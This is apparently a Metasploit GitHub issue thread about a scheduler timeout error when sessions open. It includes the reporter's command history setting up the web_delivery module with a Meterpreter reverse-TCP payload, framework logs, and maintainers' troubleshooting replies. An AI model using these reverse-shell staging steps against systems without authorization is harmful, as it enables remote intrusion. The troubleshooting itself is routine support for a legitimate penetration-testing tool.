AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
PingbackRetries=0
PingbackSleep=30
History
The following commands were ran during the session and before this issue occurred:
Collapse
49 use exploit/multi/script/web_delivery
52 set LHOST my ip
53 set srvport my port 1
65 set payload linux/x86/meterpreter_reverse_tcp
66 clear
67 show options
68 exploit
76 debug
Errors
The following errors occurred before the issue occurred:
Collapse
[09/13/2020 14:58:13] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
[09/13/2020 14:58:24] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 15:00:14] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
[09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /status
[09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /stat
Logs
The following logs were recorded before the issue occurred:
Collapse
[09/13/2020 13:30:17] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 13:30:17] [d(0)] core: Created user based module store
[09/13/2020 13:30:24] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 13:30:24] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 13:30:24] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 13:30:24] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 13:30:24] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 14:06:59] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/13/2020 14:13:25] [e(0)] core: Exploit failed (multi/handler): Interrupt - Interrupt
[09/13/2020 14:13:55] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:13:58] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:13:58] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:13:58] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:13:58] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:13:58] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 14:18:27] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[09/13/2020 14:18:38] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:18:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:18:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:18:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:18:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:18:40] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 14:49:23] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:49:23] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:49:24] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:49:24] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:50:41] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[09/13/2020 14:51:27] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:51:29] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:51:29] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:51:29] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:51:29] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:51:30] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 14:58:13] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
[09/13/2020 14:58:24] [e(0)] core: Failed to connect to the database: No database YAML file
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[09/13/2020 14:58:26] [e(0)] core: Unable to load module /metasploit-framework/modules/auxiliary/gather/office365userenum.py, unknown module type
[09/13/2020 15:00:14] [e(0)] core: Exploit failed (multi/script/web_delivery) - Msf::IncompatiblePayloadError php/meterpreter_reverse_tcp is not a compatible payload.
[09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /status
[09/13/2020 15:56:06] [e(0)] rex: Failed to find handler for resource: /stat
[09/13/2020 16:01:05] [w(0)] core: Session 1 has died
[09/13/2020 16:01:06] [w(0)] core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
Version/Install
The versions and install method of your Metasploit setup:
Collapse
Framework: 6.0.7-dev-61fd7334b7
Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [i386-linux-gnu]
Install Root: /metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Git Clone
Each time a session gets open i get this error :
core: Exception in scheduler thread Rex::TimeoutError Operation timed out.
( with all payload ( linux and php reverse tcp) with different port )
apollyonfirstcome
on 14 Sep 2020
Exception in scheduler thread
Hmm so that seems to be related to this line; https://github.com/rapid7/metasploit-framework/blob/18b2c32c78dd1ea83b8d9aacc1b6961d85653f0b/lib/msf/core/session_manager.rb#L162
That doesn't seem to be doing any timing related operations so my guess is there is some setting or something related to that which is causing the timeout error.
My thoughts are that since you are using a VPN it may be timing out due to some delay caused by the VPN itself? It shouldn't be timing out instantly though. Perhaps look at increasing the timing on settings like AutoVerifySessionTimeout, SessionCommunicationTimeout, and similar options.
Also I notice you are still getting this error:
[09/13/2020 14:18:27] [e(0)] core: Exploit failed (multi/script/web_delivery): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
Perhaps try supplying a specific IP address you know the target can connect to or another port you know you can listen on? Its possible your host is not able to bind to the port you are after cause something else is listening on it or your do not have sufficient permissions, which may be causing issues.
My last thought would be perhaps try seeing if you can allocate more memory or CPUs to your host? Seeing as this is a thread related issue, its possible it may be occurring due to a lack of available resources. This is more of a last ditch attempt than anything else but its worth a shot.
gwillcox-r7
on 14 Sep 2020
@apollyonfirstcome Also would it at all be possible to test this without the VPN? If its still occurring without the VPN then we can at least remove the possibility this is a VPN specific issue.
Edit: One more thing that was brought up in convo with Spencer was that if you generated the payload with v5 of Metasploit and you are using MSFv6 to receive the connection, your going to have a bad time due to the upgrades we made with v6. So make sure you are generating the payload with MSFv6 code and also receiving the connection/connecting to the target using MSFv6.
gwillcox-r7
on 14 Sep 2020
thank's a lot for you help and sorry to not have answer you before.
apollyonfirstcome
on 21 Sep 2020
@apollyonfirstcome Did you manage to find a soluition? If so what was the solution that you found in the end?
gwillcox-r7
on 21 Sep 2020
Related issues
Sonya2010
ยท
3Comments
fluit105
ยท
3Comments
bcoles
ยท
3Comments
wvu-r7
ยท
3Comments
0x27
ยท
3Comments
Most helpful comment
@apollyonfirstcome Also would it at all be possible to test this without the VPN? If its still occurring without the VPN then we can at least remove the possibility this is a VPN specific issue.
Edit: One more thing that was brought up in convo with Spencer was that if you generated the payload with v5 of Metasploit and you are using MSFv6 to receive the connection, your going to have a bad time due to the upgrades we made with v6. So make sure you are generating the payload with MSFv6 code and also receiving the connection/connecting to the target using MSFv6.